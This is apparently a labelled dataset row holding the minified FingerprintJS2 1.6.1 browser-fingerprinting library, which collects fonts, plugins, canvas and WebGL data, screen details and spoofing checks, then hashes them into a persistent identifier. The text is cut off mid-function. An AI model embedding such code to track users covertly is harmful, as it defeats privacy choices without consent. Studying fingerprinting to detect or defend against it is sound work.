label
int64
0
1
text
stringlengths
101
11.8M
1
!function(e,t,n){"use strict";"function"==typeof window.define&&window.define.amd?window.define(n):"undefined"!=typeof module&&module.exports?module.exports=n():t.exports?t.exports=n():t.Fingerprint2=n()}(0,this,function(){"use strict";var e=function(t){if(!(this instanceof e))return new e(t);this.options=this.extend(t,{swfContainerId:"fingerprintjs2",swfPath:"flash/compiled/FontList.swf",detectScreenOrientation:!0,sortPluginsFor:[/palemoon/i],userDefinedFonts:[]}),this.nativeForEach=Array.prototype.forEach,this.nativeMap=Array.prototype.map};return e.prototype={extend:function(e,t){if(null==e)return t;for(var n in e)null!=e[n]&&t[n]!==e[n]&&(t[n]=e[n]);return t},get:function(e){var t=this,n={data:[],addPreprocessedComponent:function(e){var i=e.value;"function"==typeof t.options.preprocessor&&(i=t.options.preprocessor(e.key,i)),n.data.push({key:e.key,value:i})}};n=this.userAgentKey(n),n=this.languageKey(n),n=this.colorDepthKey(n),n=this.deviceMemoryKey(n),n=this.pixelRatioKey(n),n=this.hardwareConcurrencyKey(n),n=this.screenResolutionKey(n),n=this.availableScreenResolutionKey(n),n=this.timezoneOffsetKey(n),n=this.sessionStorageKey(n),n=this.localStorageKey(n),n=this.indexedDbKey(n),n=this.addBehaviorKey(n),n=this.openDatabaseKey(n),n=this.cpuClassKey(n),n=this.platformKey(n),n=this.doNotTrackKey(n),n=this.pluginsKey(n),n=this.canvasKey(n),n=this.webglVendorAndRendererKey(n),n=this.adBlockKey(n),n=this.hasLiedLanguagesKey(n),n=this.hasLiedResolutionKey(n),n=this.hasLiedOsKey(n),n=this.hasLiedBrowserKey(n),n=this.touchSupportKey(n),n=this.customEntropyFunction(n),this.fontsKey(n,function(n){var i=[];t.each(n.data,function(e){var t=e.value;t&&"function"==typeof t.join&&(t=t.join(";")),i.push(t)});var o=t.x64hash128(i.join("~~~"),31);return e(o,n.data)})},customEntropyFunction:function(e){return"function"==typeof this.options.customFunction&&e.addPreprocessedComponent({key:"custom",value:this.options.customFunction()}),e},userAgentKey:function(e){return this.options.excludeUserAgent||e.addPreprocessedComponent({key:"user_agent",value:this.getUserAgent()}),e},getUserAgent:function(){return navigator.userAgent},languageKey:function(e){return this.options.excludeLanguage||e.addPreprocessedComponent({key:"language",value:navigator.language||navigator.userLanguage||navigator.browserLanguage||navigator.systemLanguage||""}),e},colorDepthKey:function(e){return this.options.excludeColorDepth||e.addPreprocessedComponent({key:"color_depth",value:window.screen.colorDepth||-1}),e},deviceMemoryKey:function(e){return this.options.excludeDeviceMemory||e.addPreprocessedComponent({key:"device_memory",value:this.getDeviceMemory()}),e},getDeviceMemory:function(){return navigator.deviceMemory||-1},pixelRatioKey:function(e){return this.options.excludePixelRatio||e.addPreprocessedComponent({key:"pixel_ratio",value:this.getPixelRatio()}),e},getPixelRatio:function(){return window.devicePixelRatio||""},screenResolutionKey:function(e){return this.options.excludeScreenResolution?e:this.getScreenResolution(e)},getScreenResolution:function(e){var t;return t=this.options.detectScreenOrientation&&window.screen.height>window.screen.width?[window.screen.height,window.screen.width]:[window.screen.width,window.screen.height],e.addPreprocessedComponent({key:"resolution",value:t}),e},availableScreenResolutionKey:function(e){return this.options.excludeAvailableScreenResolution?e:this.getAvailableScreenResolution(e)},getAvailableScreenResolution:function(e){var t;return window.screen.availWidth&&window.screen.availHeight&&(t=this.options.detectScreenOrientation?window.screen.availHeight>window.screen.availWidth?[window.screen.availHeight,window.screen.availWidth]:[window.screen.availWidth,window.screen.availHeight]:[window.screen.availHeight,window.screen.availWidth]),void 0!==t&&e.addPreprocessedComponent({key:"available_resolution",value:t}),e},timezoneOffsetKey:function(e){return this.options.excludeTimezoneOffset||e.addPreprocessedComponent({key:"timezone_offset",value:(new Date).getTimezoneOffset()}),e},sessionStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasSessionStorage()&&e.addPreprocessedComponent({key:"session_storage",value:1}),e},localStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasLocalStorage()&&e.addPreprocessedComponent({key:"local_storage",value:1}),e},indexedDbKey:function(e){return!this.options.excludeIndexedDB&&this.hasIndexedDB()&&e.addPreprocessedComponent({key:"indexed_db",value:1}),e},addBehaviorKey:function(e){return!this.options.excludeAddBehavior&&document.body&&document.body.addBehavior&&e.addPreprocessedComponent({key:"add_behavior",value:1}),e},openDatabaseKey:function(e){return!this.options.excludeOpenDatabase&&window.openDatabase&&e.addPreprocessedComponent({key:"open_database",value:1}),e},cpuClassKey:function(e){return this.options.excludeCpuClass||e.addPreprocessedComponent({key:"cpu_class",value:this.getNavigatorCpuClass()}),e},platformKey:function(e){return this.options.excludePlatform||e.addPreprocessedComponent({key:"navigator_platform",value:this.getNavigatorPlatform()}),e},doNotTrackKey:function(e){return this.options.excludeDoNotTrack||e.addPreprocessedComponent({key:"do_not_track",value:this.getDoNotTrack()}),e},canvasKey:function(e){return!this.options.excludeCanvas&&this.isCanvasSupported()&&e.addPreprocessedComponent({key:"canvas",value:this.getCanvasFp()}),e},webglVendorAndRendererKey:function(e){return!this.options.excludeWebGLVendorAndRenderer&&this.isWebGlSupported()&&e.addPreprocessedComponent({key:"webgl_vendor",value:this.getWebglVendorAndRenderer()}),e},adBlockKey:function(e){return this.options.excludeAdBlock||e.addPreprocessedComponent({key:"adblock",value:this.getAdBlock()}),e},hasLiedLanguagesKey:function(e){return this.options.excludeHasLiedLanguages||e.addPreprocessedComponent({key:"has_lied_languages",value:this.getHasLiedLanguages()}),e},hasLiedResolutionKey:function(e){return this.options.excludeHasLiedResolution||e.addPreprocessedComponent({key:"has_lied_resolution",value:this.getHasLiedResolution()}),e},hasLiedOsKey:function(e){return this.options.excludeHasLiedOs||e.addPreprocessedComponent({key:"has_lied_os",value:this.getHasLiedOs()}),e},hasLiedBrowserKey:function(e){return this.options.excludeHasLiedBrowser||e.addPreprocessedComponent({key:"has_lied_browser",value:this.getHasLiedBrowser()}),e},fontsKey:function(e,t){return this.options.excludeJsFonts?this.flashFontsKey(e,t):this.jsFontsKey(e,t)},flashFontsKey:function(e,t){return this.options.excludeFlashFonts?t(e):this.hasSwfObjectLoaded()&&this.hasMinFlashInstalled()?void 0===this.options.swfPath?t(e):void this.loadSwfAndDetectFonts(function(n){e.addPreprocessedComponent({key:"swf_fonts",value:n.join(";")}),t(e)}):t(e)},jsFontsKey:function(e,t){var n=this;return setTimeout(function(){var i=["monospace","sans-serif","serif"],o=["Andale Mono","Arial","Arial Black","Arial Hebrew","Arial MT","Arial Narrow","Arial Rounded MT Bold","Arial Unicode MS","Bitstream Vera Sans Mono","Book Antiqua","Bookman Old Style","Calibri","Cambria","Cambria Math","Century","Century Gothic","Century Schoolbook","Comic Sans","Comic Sans MS","Consolas","Courier","Courier New","Garamond","Geneva","Georgia","Helvetica","Helvetica Neue","Impact","Lucida Bright","Lucida Calligraphy","Lucida Console","Lucida Fax","LUCIDA GRANDE","Lucida Handwriting","Lucida Sans","Lucida Sans Typewriter","Lucida Sans Unicode","Microsoft Sans Serif","Monaco","Monotype Corsiva","MS Gothic","MS Outlook","MS PGothic","MS Reference Sans Serif","MS Sans Serif","MS Serif","MYRIAD","MYRIAD PRO","Palatino","Palatino Linotype","Segoe Print","Segoe Script","Segoe UI","Segoe UI Light","Segoe UI Semibold","Segoe UI Symbol","Tahoma","Times","Times New Roman","Times New Roman PS","Trebuchet MS","Verdana","Wingdings","Wingdings 2","Wingdings 3"];n.options.extendedJsFonts&&(o=o.concat(["Abadi MT Condensed Light","Academy Engraved LET","ADOBE CASLON PRO","Adobe Garamond","ADOBE GARAMOND PRO","Agency FB","Aharoni","Albertus Extra Bold","Albertus Medium","Algerian","Amazone BT","American Typewriter","American Typewriter Condensed","AmerType Md BT","Andalus","Angsana New","AngsanaUPC","Antique Olive","Aparajita","Apple Chancery","Apple Color Emoji","Apple SD Gothic Neo","Arabic Typesetting","ARCHER","ARNO PRO","Arrus BT","Aurora Cn BT","AvantGarde Bk BT","AvantGarde Md BT","AVENIR","Ayuthaya","Bandy","Bangla Sangam MN","Bank Gothic","BankGothic Md BT","Baskerville","Baskerville Old Face","Batang","BatangChe","Bauer Bodoni","Bauhaus 93","Bazooka","Bell MT","Bembo","Benguiat Bk BT","Berlin Sans FB","Berlin Sans FB Demi","Bernard MT Condensed","BernhardFashion BT","BernhardMod BT","Big Caslon","BinnerD","Blackadder ITC","BlairMdITC TT","Bodoni 72","Bodoni 72 Oldstyle","Bodoni 72 Smallcaps","Bodoni MT","Bodoni MT Black","Bodoni MT Condensed","Bodoni MT Poster Compressed","Bookshelf Symbol 7","Boulder","Bradley Hand","Bradley Hand ITC","Bremen Bd BT","Britannic Bold","Broadway","Browallia New","BrowalliaUPC","Brush Script MT","Californian FB","Calisto MT","Calligrapher","Candara","CaslonOpnface BT","Castellar","Centaur","Cezanne","CG Omega","CG Times","Chalkboard","Chalkboard SE","Chalkduster","Charlesworth","Charter Bd BT","Charter BT","Chaucer","ChelthmITC Bk BT","Chiller","Clarendon","Clarendon Condensed","CloisterBlack BT","Cochin","Colonna MT","Constantia","Cooper Black","Copperplate","Copperplate Gothic","Copperplate Gothic Bold","Copperplate Gothic Light","CopperplGoth Bd BT","Corbel","Cordia New","CordiaUPC","Cornerstone","Coronet","Cuckoo","Curlz MT","DaunPenh","Dauphin","David","DB LCD Temp","DELICIOUS","Denmark","DFKai-SB","Didot","DilleniaUPC","DIN","DokChampa","Dotum","DotumChe","Ebrima","Edwardian Script ITC","Elephant","English 111 Vivace BT","Engravers MT","EngraversGothic BT","Eras Bold ITC","Eras Demi ITC","Eras Light ITC","Eras Medium ITC","EucrosiaUPC","Euphemia","Euphemia UCAS","EUROSTILE","Exotc350 Bd BT","FangSong","Felix Titling","Fixedsys","FONTIN","Footlight MT Light","Forte","FrankRuehl","Fransiscan","Freefrm721 Blk BT","FreesiaUPC","Freestyle Script","French Script MT","FrnkGothITC Bk BT","Fruitger","FRUTIGER","Futura","Futura Bk BT","Futura Lt BT","Futura Md BT","Futura ZBlk BT","FuturaBlack BT","Gabriola","Galliard BT","Gautami","Geeza Pro","Geometr231 BT","Geometr231 Hv BT","Geometr231 Lt BT","GeoSlab 703 Lt BT","GeoSlab 703 XBd BT","Gigi","Gill Sans","Gill Sans MT","Gill Sans MT Condensed","Gill Sans MT Ext Condensed Bold","Gill Sans Ultra Bold","Gill Sans Ultra Bold Condensed","Gisha","Gloucester MT Extra Condensed","GOTHAM","GOTHAM BOLD","Goudy Old Style","Goudy Stout","GoudyHandtooled BT","GoudyOLSt BT","Gujarati Sangam MN","Gulim","GulimChe","Gungsuh","GungsuhChe","Gurmukhi MN","Haettenschweiler","Harlow Solid Italic","Harrington","Heather","Heiti SC","Heiti TC","HELV","Herald","High Tower Text","Hiragino Kaku Gothic ProN","Hiragino Mincho ProN","Hoefler Text","Humanst 521 Cn BT","Humanst521 BT","Humanst521 Lt BT","Imprint MT Shadow","Incised901 Bd BT","Incised901 BT","Incised901 Lt BT","INCONSOLATA","Informal Roman","Informal011 BT","INTERSTATE","IrisUPC","Iskoola Pota","JasmineUPC","Jazz LET","Jenson","Jester","Jokerman","Juice ITC","Kabel Bk BT","Kabel Ult BT","Kailasa","KaiTi","Kalinga","Kannada Sangam MN","Kartika","Kaufmann Bd BT","Kaufmann BT","Khmer UI","KodchiangUPC","Kokila","Korinna BT","Kristen ITC","Krungthep","Kunstler Script","Lao UI","Latha","Leelawadee","Letter Gothic","Levenim MT","LilyUPC","Lithograph","Lithograph Light","Long Island","Lydian BT","Magneto","Maiandra GD","Malayalam Sangam MN","Malgun Gothic","Mangal","Marigold","Marion","Marker Felt","Market","Marlett","Matisse ITC","Matura MT Script Capitals","Meiryo","Meiryo UI","Microsoft Himalaya","Microsoft JhengHei","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Uighur","Microsoft YaHei","Microsoft Yi Baiti","MingLiU","MingLiU_HKSCS","MingLiU_HKSCS-ExtB","MingLiU-ExtB","Minion","Minion Pro","Miriam","Miriam Fixed","Mistral","Modern","Modern No. 20","Mona Lisa Solid ITC TT","Mongolian Baiti","MONO","MoolBoran","Mrs Eaves","MS LineDraw","MS Mincho","MS PMincho","MS Reference Specialty","MS UI Gothic","MT Extra","MUSEO","MV Boli","Nadeem","Narkisim","NEVIS","News Gothic","News GothicMT","NewsGoth BT","Niagara Engraved","Niagara Solid","Noteworthy","NSimSun","Nyala","OCR A Extended","Old Century","Old English Text MT","Onyx","Onyx BT","OPTIMA","Oriya Sangam MN","OSAKA","OzHandicraft BT","Palace Script MT","Papyrus","Parchment","Party LET","Pegasus","Perpetua","Perpetua Titling MT","PetitaBold","Pickwick","Plantagenet Cherokee","Playbill","PMingLiU","PMingLiU-ExtB","Poor Richard","Poster","PosterBodoni BT","PRINCETOWN LET","Pristina","PTBarnum BT","Pythagoras","Raavi","Rage Italic","Ravie","Ribbon131 Bd BT","Rockwell","Rockwell Condensed","Rockwell Extra Bold","Rod","Roman","Sakkal Majalla","Santa Fe LET","Savoye LET","Sceptre","Script","Script MT Bold","SCRIPTINA","Serifa","Serifa BT","Serifa Th BT","ShelleyVolante BT","Sherwood","Shonar Bangla","Showcard Gothic","Shruti","Signboard","SILKSCREEN","SimHei","Simplified Arabic","Simplified Arabic Fixed","SimSun","SimSun-ExtB","Sinhala Sangam MN","Sketch Rockwell","Skia","Small Fonts","Snap ITC","Snell Roundhand","Socket","Souvenir Lt BT","Staccato222 BT","Steamer","Stencil","Storybook","Styllo","Subway","Swis721 BlkEx BT","Swiss911 XCm BT","Sylfaen","Synchro LET","System","Tamil Sangam MN","Technical","Teletype","Telugu Sangam MN","Tempus Sans ITC","Terminal","Thonburi","Traditional Arabic","Trajan","TRAJAN PRO","Tristan","Tubular","Tunga","Tw Cen MT","Tw Cen MT Condensed","Tw Cen MT Condensed Extra Bold","TypoUpright BT","Unicorn","Univers","Univers CE 55 Medium","Univers Condensed","Utsaah","Vagabond","Vani","Vijaya","Viner Hand ITC","VisualUI","Vivaldi","Vladimir Script","Vrinda","Westminster","WHITNEY","Wide Latin","ZapfEllipt BT","ZapfHumnst BT","ZapfHumnst Dm BT","Zapfino","Zurich BlkEx BT","Zurich Ex BT","ZWAdobeF"])),o=o.concat(n.options.userDefinedFonts);var a=document.getElementsByTagName("body")[0],r=document.createElement("div"),s=document.createElement("div"),d={},l={},c=function(){var e=document.createElement("span");return e.style.position="absolute",e.style.left="-9999px",e.style.fontSize="72px",e.style.lineHeight="normal",e.innerHTML="mmmmmmmmmmlli",e},u=function(e){for(var t=!1,n=0;n<i.length;n++)if(t=e[n].offsetWidth!==d[i[n]]||e[n].offsetHeight!==l[i[n]])return t;return t},h=function(){for(var e=[],t=0,n=i.length;t<n;t++){var o=c();o.style.fontFamily=i[t],r.appendChild(o),e.push(o)}return e}();a.appendChild(r);for(var p=0,g=i.length;p<g;p++)d[i[p]]=h[p].offsetWidth,l[i[p]]=h[p].offsetHeight;var f=function(){for(var e,t,n,a={},r=0,d=o.length;r<d;r++){for(var l=[],u=0,h=i.length;u<h;u++){var p=(e=o[r],t=i[u],n=void 0,(n=c()).style.fontFamily="'"+e+"',"+t,n);s.appendChild(p),l.push(p)}a[o[r]]=l}return a}();a.appendChild(s);for(var m=[],C=0,y=o.length;C<y;C++)u(f[o[C]])&&m.push(o[C]);a.removeChild(s),a.removeChild(r),e.addPreprocessedComponent({key:"js_fonts",value:m}),t(e)},1)},pluginsKey:function(e){return this.options.excludePlugins||(this.isIE()?this.options.excludeIEPlugins||e.addPreprocessedComponent({key:"ie_plugins",value:this.getIEPlugins()}):e.addPreprocessedComponent({key:"regular_plugins",value:this.getRegularPlugins()})),e},getRegularPlugins:function(){var e=[];if(navigator.plugins)for(var t=0,n=navigator.plugins.length;t<n;t++)navigator.plugins[t]&&e.push(navigator.plugins[t]);return this.pluginsShouldBeSorted()&&(e=e.sort(function(e,t){return e.name>t.name?1:e.name<t.name?-1:0})),this.map(e,function(e){var t=this.map(e,function(e){return[e.type,e.suffixes].join("~")}).join(",");return[e.name,e.description,t].join("::")},this)},getIEPlugins:function(){var e=[];if(Object.getOwnPropertyDescriptor&&Object.getOwnPropertyDescriptor(window,"ActiveXObject")||"ActiveXObject"in window){e=this.map(["AcroPDF.PDF","Adodb.Stream","AgControl.AgControl","DevalVRXCtrl.DevalVRXCtrl.1","MacromediaFlashPaper.MacromediaFlashPaper","Msxml2.DOMDocument","Msxml2.XMLHTTP","PDF.PdfCtrl","QuickTime.QuickTime","QuickTimeCheckObject.QuickTimeCheck.1","RealPlayer","RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)","RealVideo.RealVideo(tm) ActiveX Control (32-bit)","Scripting.Dictionary","SWCtl.SWCtl","Shell.UIHelper","ShockwaveFlash.ShockwaveFlash","Skype.Detection","TDCCtl.TDCCtl","WMPlayer.OCX","rmocx.RealPlayer G2 Control","rmocx.RealPlayer G2 Control.1"],function(e){try{return new window.ActiveXObject(e),e}catch(e){return null}})}return navigator.plugins&&(e=e.concat(this.getRegularPlugins())),e},pluginsShouldBeSorted:function(){for(var e=!1,t=0,n=this.options.sortPluginsFor.length;t<n;t++){var i=this.options.sortPluginsFor[t];if(navigator.userAgent.match(i)){e=!0;break}}return e},touchSupportKey:function(e){return this.options.excludeTouchSupport||e.addPreprocessedComponent({key:"touch_support",value:this.getTouchSupport()}),e},hardwareConcurrencyKey:function(e){return this.options.excludeHardwareConcurrency||e.addPreprocessedComponent({key:"hardware_concurrency",value:this.getHardwareConcurrency()}),e},hasSessionStorage:function(){try{return!!window.sessionStorage}catch(e){return!0}},hasLocalStorage:function(){try{return!!window.localStorage}catch(e){return!0}},hasIndexedDB:function(){try{return!!window.indexedDB}catch(e){return!0}},getHardwareConcurrency:function(){return navigator.hardwareConcurrency?navigator.hardwareConcurrency:"unknown"},getNavigatorCpuClass:function(){return navigator.cpuClass?navigator.cpuClass:"unknown"},getNavigatorPlatform:function(){return navigator.platform?navigator.platform:"unknown"},getDoNotTrack:function(){return navigator.doNotTrack?navigator.doNotTrack:navigator.msDoNotTrack?navigator.msDoNotTrack:window.doNotTrack?window.doNotTrack:"unknown"},getTouchSupport:function(){var e=0,t=!1;void 0!==navigator.maxTouchPoints?e=navigator.maxTouchPoints:void 0!==navigator.msMaxTouchPoints&&(e=navigator.msMaxTouchPoints);try{document.createEvent("TouchEvent"),t=!0}catch(e){}return[e,t,"ontouchstart"in window]},getCanvasFp:function(){var e=[],t=document.createElement("canvas");t.width=2e3,t.height=200,t.style.display="inline";var n=t.getContext("2d");return n.rect(0,0,10,10),n.rect(2,2,6,6),e.push("canvas winding:"+(!1===n.isPointInPath(5,5,"evenodd")?"yes":"no")),n.textBaseline="alphabetic",n.fillStyle="#f60",n.fillRect(125,1,62,20),n.fillStyle="#069",this.options.dontUseFakeFontInCanvas?n.font="11pt Arial":n.font="11pt no-real-font-123",n.fillText("Cwm fjordbank glyphs vext quiz, 😃",2,15),n.fillStyle="rgba(102, 204, 0, 0.2)",n.font="18pt Arial",n.fillText("Cwm fjordbank glyphs vext quiz, 😃",4,45),n.globalCompositeOperation="multiply",n.fillStyle="rgb(255,0,255)",n.beginPath(),n.arc(50,50,50,0,2*Math.PI,!0),n.closePath(),n.fill(),n.fillStyle="rgb(0,255,255)",n.beginPath(),n.arc(100,50,50,0,2*Math.PI,!0),n.closePath(),n.fill(),n.fillStyle="rgb(255,255,0)",n.beginPath(),n.arc(75,100,50,0,2*Math.PI,!0),n.closePath(),n.fill(),n.fillStyle="rgb(255,0,255)",n.arc(75,75,75,0,2*Math.PI,!0),n.arc(75,75,25,0,2*Math.PI,!0),n.fill("evenodd"),t.toDataURL&&e.push("canvas fp:"+t.toDataURL()),e.join("~")},getWebglVendorAndRenderer:function(){try{var e=this.getWebglCanvas(),t=e.getExtension("WEBGL_debug_renderer_info");return e.getParameter(t.UNMASKED_VENDOR_WEBGL)+"~"+e.getParameter(t.UNMASKED_RENDERER_WEBGL)}catch(e){return null}},getAdBlock:function(){var e=document.createElement("div");e.innerHTML="&nbsp;",e.className="adsbox";var t=!1;try{document.body.appendChild(e),t=0===document.getElementsByClassName("adsbox")[0].offsetHeight,document.body.removeChild(e)}catch(e){t=!1}return t},getHasLiedLanguages:function(){if(void 0!==navigator.languages)try{if(navigator.languages[0].substr(0,2)!==navigator.language.substr(0,2))return!0}catch(e){return!0}return!1},getHasLiedResolution:function(){return window.screen.width<window.screen.availWidth||window.screen.height<window.screen.availHeight},getHasLiedOs:function(){var e,t=navigator.userAgent.toLowerCase(),n=navigator.oscpu,i=navigator.platform.toLowerCase();if(e=t.indexOf("windows phone")>=0?"Windows Phone":t.indexOf("win")>=0?"Windows":t.indexOf("android")>=0?"Android":t.indexOf("linux")>=0?"Linux":t.indexOf("iphone")>=0||t.indexOf("ipad")>=0?"iOS":t.indexOf("mac")>=0?"Mac":"Other",("ontouchstart"in window||navigator.maxTouchPoints>0||navigator.msMaxTouchPoints>0)&&"Windows Phone"!==e&&"Android"!==e&&"iOS"!==e&&"Other"!==e)return!0;if(void 0!==n){if((n=n.toLowerCase()).indexOf("win")>=0&&"Windows"!==e&&"Windows Phone"!==e)return!0;if(n.indexOf("linux")>=0&&"Linux"!==e&&"Android"!==e)return!0;if(n.indexOf("mac")>=0&&"Mac"!==e&&"iOS"!==e)return!0;if((-1===n.indexOf("win")&&-1===n.indexOf("linux")&&-1===n.indexOf("mac"))!=("Other"===e))return!0}return i.indexOf("win")>=0&&"Windows"!==e&&"Windows Phone"!==e||((i.indexOf("linux")>=0||i.indexOf("android")>=0||i.indexOf("pike")>=0)&&"Linux"!==e&&"Android"!==e||((i.indexOf("mac")>=0||i.indexOf("ipad")>=0||i.indexOf("ipod")>=0||i.indexOf("iphone")>=0)&&"Mac"!==e&&"iOS"!==e||((-1===i.indexOf("win")&&-1===i.indexOf("linux")&&-1===i.indexOf("mac"))!=("Other"===e)||void 0===navigator.plugins&&"Windows"!==e&&"Windows Phone"!==e)))},getHasLiedBrowser:function(){var e,t=navigator.userAgent.toLowerCase(),n=navigator.productSub;if(("Chrome"===(e=t.indexOf("firefox")>=0?"Firefox":t.indexOf("opera")>=0||t.indexOf("opr")>=0?"Opera":t.indexOf("chrome")>=0?"Chrome":t.indexOf("safari")>=0?"Safari":t.indexOf("trident")>=0?"Internet Explorer":"Other")||"Safari"===e||"Opera"===e)&&"20030107"!==n)return!0;var i,o=eval.toString().length;if(37===o&&"Safari"!==e&&"Firefox"!==e&&"Other"!==e)return!0;if(39===o&&"Internet Explorer"!==e&&"Other"!==e)return!0;if(33===o&&"Chrome"!==e&&"Opera"!==e&&"Other"!==e)return!0;try{throw"a"}catch(e){try{e.toSource(),i=!0}catch(e){i=!1}}return!(!i||"Firefox"===e||"Other"===e)},isCanvasSupported:function(){var e=document.createElement("canvas");return!(!e.getContext||!e.getContext("2d"))},isWebGlSupported:function(){if(!this.isCanvasSupported())return!1;var e=this.getWebglCanvas();return!!window.WebGLRenderingContext&&!!e},isIE:function(){return"Microsoft Internet Explorer"===navigator.appName||!("Netscape"!==navigator.appName||!/Trident/.test(navigator.userAgent))},hasSwfObjectLoaded:function(){return void 0!==window.swfobject},hasMinFlashInstalled:function(){return window.swfobject.hasFlashPlayerVersion("9.0.0")},addFlashDivNode:function(){var e=document.createElement("div");e.setAttribute("id",this.options.swfContainerId),document.body.appendChild(e)},loadSwfAndDetectFonts:function(e){var t="___fp_swf_loaded";window[t]=function(t){e(t)};var n=this.options.swfContainerId;this.addFlashDivNode();var i={onReady:t};window.swfobject.embedSWF(this.options.swfPath,n,"1","1","9.0.0",!1,i,{allowScriptAccess:"always",menu:"false"},{})},getWebglCanvas:function(){var e=document.createElement("canvas"),t=null;try{t=e.getContext("webgl")||e.getContext("experimental-webgl")}catch(e){}return t||(t=null),t},each:function(e,t,n){if(null!==e)if(this.nativeForEach&&e.forEach===this.nativeForEach)e.forEach(t,n);else if(e.length===+e.length){for(var i=0,o=e.length;i<o;i++)if(t.call(n,e[i],i,e)==={})return}else for(var a in e)if(e.hasOwnProperty(a)&&t.call(n,e[a],a,e)==={})return},map:function(e,t,n){var i=[];return null==e?i:this.nativeMap&&e.map===this.nativeMap?e.map(t,n):(this.each(e,function(e,o,a){i[i.length]=t.call(n,e,o,a)}),i)},x64Add:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var n=[0,0,0,0];return n[3]+=e[3]+t[3],n[2]+=n[3]>>>16,n[3]&=65535,n[2]+=e[2]+t[2],n[1]+=n[2]>>>16,n[2]&=65535,n[1]+=e[1]+t[1],n[0]+=n[1]>>>16,n[1]&=65535,n[0]+=e[0]+t[0],n[0]&=65535,[n[0]<<16|n[1],n[2]<<16|n[3]]},x64Multiply:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var n=[0,0,0,0];return n[3]+=e[3]*t[3],n[2]+=n[3]>>>16,n[3]&=65535,n[2]+=e[2]*t[3],n[1]+=n[2]>>>16,n[2]&=65535,n[2]+=e[3]*t[2],n[1]+=n[2]>>>16,n[2]&=65535,n[1]+=e[1]*t[3],n[0]+=n[1]>>>16,n[1]&=65535,n[1]+=e[2]*t[2],n[0]+=n[1]>>>16,n[1]&=65535,n[1]+=e[3]*t[1],n[0]+=n[1]>>>16,n[1]&=65535,n[0]+=e[0]*t[3]+e[1]*t[2]+e[2]*t[1]+e[3]*t[0],n[0]&=65535,[n[0]<<16|n[1],n[2]<<16|n[3]]},x64Rotl:function(e,t){return 32===(t%=64)?[e[1],e[0]]:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t|e[0]>>>32-t]:(t-=32,[e[1]<<t|e[0]>>>32-t,e[0]<<t|e[1]>>>32-t])},x64LeftShift:function(e,t){return 0===(t%=64)?e:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t]:[e[1]<<t-32,0]},x64Xor:function(e,t){return[e[0]^t[0],e[1]^t[1]]},x64Fmix:function(e){return e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[4283543511,3981806797]),e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[3301882366,444984403]),e=this.x64Xor(e,[0,e[0]>>>1])},x64hash128:function(e,t){e=e||"",t=t||0;for(var n=e.length%16,i=e.length-n,o=[0,t],a=[0,t],r=[0,0],s=[0,0],d=[2277735313,289559509],l=[1291169091,658871167],c=0;c<i;c+=16)r=[255&e.charCodeAt(c+4)|(255&e.charCodeAt(c+5))<<8|(255&e.charCodeAt(c+6))<<16|(255&e.charCodeAt(c+7))<<24,255&e.charCodeAt(c)|(255&e.charCodeAt(c+1))<<8|(255&e.charCodeAt(c+2))<<16|(255&e.charCodeAt(c+3))<<24],s=[255&e.charCodeAt(c+12)|(255&e.charCodeAt(c+13))<<8|(255&e.charCodeAt(c+14))<<16|(255&e.charCodeAt(c+15))<<24,255&e.charCodeAt(c+8)|(255&e.charCodeAt(c+9))<<8|(255&e.charCodeAt(c+10))<<16|(255&e.charCodeAt(c+11))<<24],r=this.x64Multiply(r,d),r=this.x64Rotl(r,31),r=this.x64Multiply(r,l),o=this.x64Xor(o,r),o=this.x64Rotl(o,27),o=this.x64Add(o,a),o=this.x64Add(this.x64Multiply(o,[0,5]),[0,1390208809]),s=this.x64Multiply(s,l),s=this.x64Rotl(s,33),s=this.x64Multiply(s,d),a=this.x64Xor(a,s),a=this.x64Rotl(a,31),a=this.x64Add(a,o),a=this.x64Add(this.x64Multiply(a,[0,5]),[0,944331445]);switch(r=[0,0],s=[0,0],n){case 15:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+14)],48));case 14:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+13)],40));case 13:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+12)],32));case 12:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+11)],24));case 11:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+10)],16));case 10:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+9)],8));case 9:s=this.x64Xor(s,[0,e.charCodeAt(c+8)]),s=this.x64Multiply(s,l),s=this.x64Rotl(s,33),s=this.x64Multiply(s,d),a=this.x64Xor(a,s);case 8:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+7)],56));case 7:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+6)],48));case 6:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+5)],40));case 5:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+4)],32));case 4:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+3)],24));case 3:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+2)],16));case 2:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+1)],8));case 1:r=this.x64Xor(r,[0,e.charCodeAt(c)]),r=this.x64Multiply(r,d),r=this.x64Rotl(r,31),r=this.x64Multiply(r,l),o=this.x64Xor(o,r)}return o=this.x64Xor(o,[0,e.length]),a=this.x64Xor(a,[0,e.length]),o=this.x64Add(o,a),a=this.x64Add(a,o),o=this.x64Fmix(o),a=this.x64Fmix(a),o=this.x64Add(o,a),a=this.x64Add(a,o),("00000000"+(o[0]>>>0).toString(16)).slice(-8)+("00000000"+(o[1]>>>0).toString(16)).slice(-8)+("00000000"+(a[0]>>>0).toString(16)).slice(-8)+("00000000"+(a[1]>>>0).toString(16)).slice(-8)}},e.VERSION="1.6.1",e}),function(e,t){var 